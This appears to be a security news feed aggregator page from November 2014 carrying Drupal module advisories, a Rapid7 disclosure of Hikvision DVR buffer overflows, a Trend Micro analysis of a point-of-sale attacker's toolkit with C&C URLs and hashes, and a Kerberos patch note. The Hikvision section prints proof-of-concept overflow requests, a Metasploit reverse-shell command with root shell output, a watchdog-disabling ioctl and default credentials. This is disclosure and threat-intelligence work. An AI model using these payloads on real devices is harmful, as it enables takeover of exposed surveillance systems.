Feed aggregator

SA-CONTRIB-2014-115 - Form Builder - Cross-Site Scripting (XSS)

Drupal contributed modules - Wed, 11/19/2014 - 20:34
Description

The Form Builder module enables users to build entire Form API structures through a graphical, AJAX-like interface.

The module doesn't sufficiently sanitize form titles in some cases.

This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create forms in another module that depends on Form Builder, such as Survey Builder, Webform, or others.

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Form Builder 7.x-1.x versions prior to 7.x-1.6.
  • Form Builder 6.x-1.x versions prior to 6.x-1.6.

Drupal core is not affected. If you do not use the contributed Form Builder module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Form Builder project page.

Reported by
  • Matt Vance provisional member of the Drupal Security Team
Fixed by Coordinated by
  • Matt Vance provisional member of the Drupal Security Team
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 6.xDrupal 7.x
Categories: security

R7-2014-18: Hikvision DVR Devices - Multiple Vulnerabilities

Meta-Sploit - Wed, 11/19/2014 - 20:17

Rapid7 Labs has found multiple vulnerabilities in Hikvision DVR (Digital Video Recorder) devices such as the DS-7204 and other models in the same product series that allow a remote attacker to gain full control of the device. More specifically, three typical buffer overflow vulnerabilities were discovered in Hikvision's RTSP request handling code: CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880. This blog post serves as disclosure of the technical details for those vulnerabilities. In addition, a remote code execution through a Metasploit exploit module has been published.

 

Vulnerability Summary

 

After starting Project Sonar in 2013, Rapid7 Labs started investigating several protocols, services and devices that are popular on the internet, in order to find and raise awareness about widespread misconfigurations and vulnerabilities. One category of these devices are so called "Digital Video Recorders" or sometimes "Network Video Recorders". Typically they are used to record surveillance footage of office buildings and surrounding areas or even private properties.


Sieving through our Sonar datasets, several vendors and families of these devices turned up, but the Hikvision models in particular are very popular and widespread across the public IPv4 address space with around 150,000 devices remotely accessible. Speculating about reasons for this popularity, one could argue that the iPhone app which can view the surveillance streams remotely, is very appealing to a lot of customers.


Now apart from the fact that these devices come with a default administrative account "admin" with password "12345", it also contains several quickly found vulnerabilities that ultimately lead to full remote compromise. During our initial analysis we found three different buffer overflow vulnerabilties in the RTSP request handler:


  • [CVE-2014-4878] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request body handling
  • [CVE-2014-4879] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP request header handling
  • [CVE-2014-4880] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP basic authentication handling

 

CVE-2014-4878 - Buffer Overflow in the RTSP Request Body Handling

 

The RTSP request handler uses a fixed size buffer of 2048 bytes for consuming the HTTP request body, which leads to a buffer overflow condition when sending a larger body. This most likely can be exploited for code execution, however we just present a Denial-of-Service proof here:

request =  "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST request += "CSeq: 7\r\n" request += "Authorization: Basic AAAAAAA\r\n" request += "Content-length: 3200\r\n\r\n" request += "A"*3200 CVE-2014-4879 - Buffer Overflow in the RTSP Request Header Handling

 

The RTSP request handler uses fixed size buffers when parsing the HTTP headers, which leads to a buffer overflow condition when sending a large header key. This most likely can be exploited for code execution, however we just present a Denial-of-Service proof here:

request =  "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST request += "Authorization" request += "A" * 1024 request += ": Basic AAAAAAA\r\n\r\n" CVE-2014-4880 - Buffer Overflow in the RTSP Basic Authentication Handling

 

The Metasploit module written for the vulnerability sends a crafted RTSP request that triggers a buffer overflow condition when handling the "Basic Auth" header of a RTSP transaction. Due to this condition the request takes control of the remote instruction pointer and diverts execution to a series of ROP gadgets that pivot the stack to an area within the request packet itself in order to continue execution there. The code placed in this area in the case below is a standard reverse shellcode generated by Metasploit.

./msfcli exploit/linux/misc/hikvision_rtsp_bof payload=linux/armle/shell_reverse_tcp RHOST=192.0.0.64 LHOST=192.0.0.2 SHELL=/bin/sh SHELLARG=sh E [*] Initializing modules... payload => linux/armle/shell_reverse_tcp RHOST => 192.0.0.64 LHOST => 192.0.0.2 SHELL => /bin/sh SHELLARG => sh [*] Started reverse handler on 192.0.0.2:4444 [*] Command shell session 1 opened (192.0.0.2:4444 -> 192.0.0.64:52021) at 2014-09-15 18:09:03 +0200 id uid=0(root) gid=0(root)

No authentication is required to exploit this vulnerability and the Metasploit module successfully demonstrates gaining full control of the remote device.

Hikvision Reboot Watchdog - Post Exploitation

 

The firmware implements a watchdog functionality in form of a kernel module which can be contacted through the /dev/watchdog device node. The main binary opens this node and writes one byte to it every two seconds. If that behavior stops, the kernel module reboots the device. To stop this, one can issue an ioctl to disable the watchdog functionality after getting into the system, with the following ioctl:

int one = 1; int fd = open("/dev/watchdog", 2); int ret = ioctl(fd, 0x80045704, &one);

After running this on the device, either as part of the shellcode or as a post-exploitation stage, the watchdog does not reboot the device anymore.

Vendor Analysis, Solutions and Workarounds

 

The device under test was a Hikvision-DS-7204-HVI-SV digital video recorder device with firmware V2.2.10 build 131009 (Oct 2013). Other devices in the same model range are affected too, however, we do not have an exhaustive list of firmware versions and models.

Prior to this research, CVE-2013-4977 was discovered by Anibal Sacco and Federico Muttis from Core Exploit Writers Team, affecting multiple Hikvision devices. We confirmed the device under test for this advisory is still vulnerable to their attack. Given the presence of this prior vulnerability in the analyzed DVR device, we believe that it is likely that all products offering identical features are affected by these issues.

Hikvision provided no response to these issues after several attempts to contact them. In order to mitigate these exposures, until a patch is released, Hikvision DVR devices and similar products should not be exposed to internet without the usual additional protective measures, such as an authenticated proxy, VPN-only access, et cetera.

 

Sidenote on previous compromise of DVRs by Malware

 

Earlier this year researchers from SANS found a botnet consisting mostly of DVR devices and routers which does bitcoin mining as one of it's main purposes. This botnet used default credentials to compromise the devices and while we don't have any statistics on the number of infected devices, we assume that a relatively high percentage of devices actually still has the default password configured. However, more widespread exploitation possibilities not only on DVRs but also other embedded devices could lead to a larger botnet that subsequently poses a larger threat to the rest of the internet.

 

Vulnerability Disclosure Timeline and Researcher Credit

 

CVE-2014-4878, CVE-2014-4879 and CVE-2014-4880 were discovered and researched by Mark Schloesser from Rapid7 Labs

 

Disclosure Timeline:

Sep 15, 2014: Vendor contacted

Oct 06, 2014: Disclosure to CERT/CC

Oct 09, 2014: CVE identifiers assigned

Nov 19, 2014: Public disclosure

Nov 19, 2014: Metasploit module for CVE-2014-4880 published as PR 4235

Categories: security

SA-CONTRIB-2014-114 - Tournament - Cross Site Scripting

Drupal contributed modules - Wed, 11/19/2014 - 20:11
Description

This project allows you to create various types of tournaments (as nodes) and associated teams, tournaments, and matches.

There are several cases in the project where an account username, node title, and team entity title are not correctly filtered before being displayed to a user.

It is possible to create nodes or entities containing XSS or usernames could be imported with XSS in the strings or created via an add-on module like LDAP or similar.

This vulnerability is mitigated by the fact that an attacker must have a role with the permissions "Create new teams" or "Tournament: Create new content" or "Match: Create new content" or the ability to create users with an XSS payload in the usernames (Drupal core's input validation prevents XSS payloads in usernames).

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Tournament 7.x-1.x any version

Drupal core is not affected. If you do not use the contributed Tournament module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Tournament project page.

Reported by Fixed by Coordinated by Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 7.x
Categories: security

SA-CONTRIB-2014-113 - Secure Password Hashes - Denial of Service

Drupal contributed modules - Wed, 11/19/2014 - 19:54
Description

This module enables a more secure password storage for Drupal 6 by back-porting the code used in Drupal 7 core.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

This vulnerability can be exploited by anonymous users

See also: https://www.drupal.org/SA-CORE-2014-006

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Secure Password Hashes 6.x-2.x versions prior to 6.x-2.1.

Drupal core is not affected. If you do not use the contributed Secure Password Hashes module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Secure Password Hashes project page.

Reported by Fixed by
  • Peter Wolanin the module maintainer and Drupal Security Team member
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 6.x
Categories: security

Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006

Drupal core - Wed, 11/19/2014 - 18:21
Description Session hijacking (Drupal 6 and 7)

A specially crafted request can give a user access to another user's session, allowing an attacker to hijack a random session.

This attack is known to be possible on certain Drupal 7 sites which serve both HTTP and HTTPS content ("mixed-mode"), but it is possible there are other attack vectors for both Drupal 6 and Drupal 7.

Denial of service (Drupal 7 only)

Drupal 7 includes a password hashing API to ensure that user supplied passwords are not stored in plain text.

A vulnerability in this API allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

This vulnerability can be exploited by anonymous users.

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Drupal core 6.x versions prior to 6.34.
  • Drupal core 7.x versions prior to 7.34.
Solution

Install the latest version:

If you have configured a custom session.inc file for your Drupal 6 or Drupal 7 site you also need to make sure that it is not prone to the same session hijacking vulnerability disclosed in this security advisory.

If you have configured a custom password.inc file for your Drupal 7 site you also need to make sure that it is not prone to the same denial of service vulnerability disclosed in this security advisory. See also the similar security advisory for the Drupal 6 contributed Secure Password Hashes module: SA-CONTRIB-2014-113

Also see the Drupal core project page.

Reported by

Session hijacking:

Denial of service:

Fixed by

Session hijacking:

Denial of service:

Coordinated by
  • The Drupal Security Team
Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Edits to this advisory since publishing
  • Edited to mention the effect on sites that have configured a custom session.inc file.
Drupal version: Drupal 6.xDrupal 7.x
Categories: security

SA-CONTRIB-2014-112 - Node Field - Cross Site Scripting (XSS)

Drupal contributed modules - Wed, 11/19/2014 - 18:06
Description

Node Field module allows you to add custom extra fields to single Drupal nodes.

The module doesn't sufficiently sanitize user input for some of the module's internal fields. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to create nodes.

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Node Field 7.x-2.x versions prior to 7.x-2.45.

Drupal core is not affected. If you do not use the contributed Node Field module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Node Field project page.

Reported by Fixed by Coordinated by Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 7.x
Categories: security

SA-CONTRIB-2014-111 - Protected Pages - Password Protection Bypass

Drupal contributed modules - Wed, 11/19/2014 - 17:56
Description

Protected Pages modules allows the administrator to secure any page in your website by password by configuring a add path and the associated password.

The module did not sufficiently protect variations on the protected path.

CVE identifier(s) issued
  • A CVE identifier will be requested, and added upon issuance, in accordance
    with Drupal Security Team processes.
Versions affected
  • Protected Pages 7.x-2.x versions prior to 7.x-2.2.

Drupal core is not affected. If you do not use the contributed Protected Pages module,
there is nothing you need to do.

Solution

Install the latest version:

Also see the Protected Pages project page.

Reported by Fixed by Coordinated by Contact and More Information

The Drupal security team can be reached at security at drupal.org or via the contact form at https://www.drupal.org/contact.

Learn more about the Drupal Security team and their policies, writing secure code for Drupal, and securing your site.

Follow the Drupal Security Team on Twitter at https://twitter.com/drupalsecurity

Drupal version: Drupal 7.x
Categories: security

A New Free CA (Schneier blog)

SANS diary - Wed, 11/19/2014 - 14:00
Categories: security

A Peek Inside a PoS Scammer’s Toolbox

Trend-Micro - Wed, 11/19/2014 - 13:00

PoS malware has been receiving a tremendous amount of attention in the past two years with high profile incidents like Target, Home Depot, and Kmart. With the massive “Black Friday” shopping season coming up, PoS malware will surely get additional publicity. This high profile nature means, we constantly look for evolving PoS malware and look into their behavior patterns to better protect our customers and users.

In order to be successful, PoS scammers don’t rely only on their malware to attack and exfiltrate victim data. They also use a wide variety of tools in order to support their endeavors. Some of these tools are also used by system administrators such as putty, as well as other tools provided by Microsoft as part of the Sysinternals suite.

Looking at the additional tools PoS threat actors use can be interesting because we can get a preview into their daily activities and use this to profile their activities.

PoS Terminal Insecurities

Unfortunately, PoS terminals and environments  are very often left insecure. This makes them an excellent target of opportunity for attackers. There are a variety of methods used when attackers go after PoS terminals. One way attackers look to gain access to PoS devices is via VNC (Virtual Network Computing). Typically, credentials are either non-existent or very insecure. This presents many opportunities for attackers to use tools to attack VNC credentials.

Microsoft’s Remote Desktop Protocol presents an additional weak point in PoS environments. Unfortunately, the same weaknesses often found in VNC sessions are also found in RDP configurations. Weak and/or nonexistent credentials is common within PoS terminals using RDP. This also presents many opportunities for attackers to leverage tools to attack RDP sessions.

BackOff Actor Toolkits

Earlier this year, Trend Micro published a paper detailing many different PoS RAM scrapers, including BackOff. Backoff became popular and widely used starting in July of 2014 because it’s custom-packed to obfuscate its code and make it difficult for security researchers to reverse-engineer its binaries.

BackOff will almost always, in some way, communicate to a command-and-control (CYC) server to exfiltrate data or receive configuration updates. In addition to receiving commands and exfiltrating data, these same server’s are often used to transfer tools to and from victim machines. This helps the attacker easily and quickly get tasks done while drawing the least amount of attention by reducing the amount of work the attacker has to do to transfer these tools to multiple victims.

When looking at BackOff variants, one particular sample drew our attention – r0.exe. Upon examination, we found that this sample connects to http://143biz.cc.md-14.webhostbox.net. The infection vector is not known

The particular C&C server contained a wealth of information about what tools the attackers are using, as well as how they stored their data. We noticed that there were a litany of other tools that the attackers were using. Typically, these tools are used in conjunction with or after a compromised machine has been infected.

The server contained on the server multiple files, including ZIP files, which are broken down further below. This is not an all-inclusive list of all files on the server, but is meant to showcase the tools and capabilities of these actors.

r0.exe (MD5 hash: 7a5580ddf2eb2fc4f4a0ea28c40f0da9) – This file is a BackOff sample that was compiled on October 22, 2014. The file communicates to the following URLs for its C&C functions:

  • https://cyberwise.biz/register/register.php
  • https://verified-deal.com/register/register.php

r0.exe also creates a known BackOff mute, aMD6qt7lWb1N3TNBSe4N)

3-2.exe (MD5 hash: 0fb00a8ad217abe9d92a1faa397842dc) – This file is also a BackOff sample which was compiled approximately a month earlier than r0.exe (it was compiled on September 16, 2014). This file communicates to:

  • https://kitchentools.ru/phpbb/showtopic.php
  • https://cyclingtools.ru/phpbb/showtopic.php
  • https://biketools.ru/phpbb/showtopic.php

DK Brute priv8.rar (MD5 hash: 028c9a1619f96dbfd29ca64199f4acde) – This RAR file contains multiple tools and files. One of these files is putty.exe, an SSH/telnet client. Also included was UltraVNCViewerPortable.exe, and WinSCP. Both of these tools make sense to include in a scammer’s toolkit, as they can be used because to connect to remote systems and transfer files.

DK Brute.exe is also included; this is a tool used to brute force Windows RDP and other remote connection protocols, using a password list.

IPCity.rar (MD5 hash: 9223e3472e8ff9ddfa0d0dbad573d530) – This RAR file contains three files. One is a .CSV file (GeoLiteCity.csv) which is used to map latitude/longitude coordinates to countries. This file appears to have been offered earlier as a free download from Maxmind, which provides databases to map physical locations to IP blocks. A tool called ip_city.exe was also in the file, which is used to convert

Contained within IPCity.rar, there are three files. One .csv file, GeoLiteCity.csv, contains country to latitude and longitude coordinate specifications. GeoLiteCity.csv appears to be an older free download from Maxminds DB, which provides  access to a multitude of databases to map location to IP blocks.

A tool called ip_city.exe was in the .RAR file as well. This tool is used to convert city and country locations to IP blocks. Taken collectively, these tools can be used by an attacker to better scan and target particular countries and IP blocks.

Figure 1. Screenshot of ip_city.exe

VUBrute 1.0.zip (MD5 hash: 01d12f4f2f0d3019756d83e94e3b564b) – This password-protected ZIP file contains a a VNC brute forcer, VUBrute. This tool is popular in Russian underground forums and is used to compromise VNC credentials.

Figure 2. Screenshot of VUBrute

logmein_checker.rar (MD5 hash: 5843ae35bdeb4ca577054936c5c3944e) – This RAR file contains an application called Logmein Checker. LogMeIn is a popular commercial remote access tool. This application takes an account list (list of username/password combinations) and runs it though a list of IP addresses/ports. This is used to find valid LogMeIn sessions using weak credentials.

Figure 3. Logmein Checker UI

The attackers are likely using this to attack either PoS machines with weak LogMeIn credentials, or other machines on networks that also contain PoS devices.

portscan.rar (MD5 hash: 8b5436ca6e520d6942087bb38e97da65) – This file contains a file named KPortScan3.exe, which is a basic port scanner. It allows IP ranges and port numbers to be entered. Based on data obtained from the C&C server, we believe this tool was used to scan ports 445, 3389, 5900, as well as other ports. It’s likely this tool was chosen because of its ease of use and the likelihood that a port scanner would be run in Windows.

Figure 4. Port scanner UI

C&C Infrastructure Analysis and Relationship Building

After looking closer at the C&C server, we pivoted and found additional files that are and have been hosted on it. In total, there have been over 9 unique samples of malware hosted on http://143biz.cc.md-14.webhostbox.net, dating back to February of 2014. This includes PoS malware, including Alina, a popular PoS RAM scraper.

We also found an additional directory on this server: http://143biz.cc.md-14.webhostbox.net/something/login.php?p=Rome0. The name Rome0 may look familiar to those of you who Xyiltol and the Trackingcybercrime blog.

While accessing this directory doesn’t generate a response, we continued to check for sites that had /something/login.php?p=Rome0 as part of the URL. When doing this, we found another site: https://blog.-wordpress-catalog.com/something/login.php?p=Rome0. Looking closer at the relationship between 143.biz.cc.md-14.webhostbox.net and wordpress-catalog.com, we saw that there was an open directory on the C&C server: http://143biz.cc.md-14.webhostbox.net/accounts.wordpress-catalog.com. These URLs don’t return any results either.

When we looked at the root directory, however, we found a Zip file named something.zip (MD5 hash: f9cbd1c3c48c873f3bff8c957ae280c7). This file contained what appeared to be the code for the C&C server, as well as several text documents containing names and credit card track data.

Figure 5. Server root directory contents

While we don’t know if the same French criminal Rome0 owns or operates these two servers for PoS operations, we do know that both servers have used Rome0 in their URL. We also noticed in one of the text files a directory named /home/rome0/
public_html/something/bot.php, presumably showing the user’s internal directory for hosting files. In addition, we know that Rome0 is heavily involved in PoS malware and carding, based on Xyiltol’s excellent investigative work.

Conclusion

While we didn’t showcase many new tools in this post, it is an interesting case study as to some of the tools that PoS scammers use. This list isn’t exhaustive, but it shows that the attackers using these tools are not relatively advanced. They use what works, without reinventing the wheel and developing new programs.

Information about these tools is useful in order for administrators in order to help protect PoS systems on a regular basis.

In addition to the malicious files listed above, here is a list of all the URLs we looked into for this post:

  • http://143biz.cc.md-14.webhostbox.net
  • https://biketools.ru/phpbb/showtopic.php
  • https://blog.wordpress-catalog.com/
  • https://cyberwise.biz/register/register.php
  • https://cyclingtools.ru/phpbb/showtopic.php
  • https://kitchentools.ru/phpbb/showtopic.php
  • https://verified-deal.com/register/register.php

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

A Peek Inside a PoS Scammer’s Toolbox

Categories: security

Patched Windows Vulnerability Allows For Remote Privilege Escalation

Trend-Micro - Wed, 11/19/2014 - 08:53

Microsoft has released an out-of-band security bulletin (MS14-068) that addresses a vulnerability in the implementation of Kerberos in various versions of Windows. The bulletin states that this vulnerability is already being used in “limited, targeted attacks”. This warning, plus the fact that Microsoft considered this threat serious enough to merit an out-of-cycle patch, should make users consider patching as soon as possible.

Kerberos is a protocol used to authenticate users within a network. This vulnerability (designated as CVE-2014-6324) could allow an attacker to escalate privileges to that of a domain administrator; this could then be used to compromise any system connected to that domain, including domain servers.

This is a serious flaw which lends itself to usage in targeted attacks. An attacker will have to use separate means to penetrate a network, but once inside this vulnerability could be used to compromise any machine connected to the organization’s domain server (effectively, all machines).

Used properly, this vulnerability is as effective a tool for moving laterally within an organization as is known today. No workaround or mitigation has been clearly identified by Microsoft (aside from patching the vulnerability); the only requirement for a successful attack is for the attacker to already have valid domain credentials. For an attacker that has already penetrated existing networks, this hardly represents a barrier.

The damage an attacker could do if an organization’s domain server was compromised could be significant. In a worst case scenario, the entire domain would have to be rebuilt from the ground up, which would be extremely costly in time and resources for any organization.

Microsoft itself suggests that this attack has been used in targeted attacks saying that they “are aware of limited, targeted attacks that attempt to exploit this vulnerability.” With knowledge that a vulnerability exists, and information provided by the patch, we can expect to see more attacks that target this flaw in the future.

The vulnerability is present in all server versions of Windows from Server 2003 onward. Administrators should immediately roll out patches to these systems as soon as is practical. A patch is available for client versions of Windows, but this is a defense-in-depth upgrade that does not address any vulnerabilities.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Patched Windows Vulnerability Allows For Remote Privilege Escalation

Categories: security
Syndicate content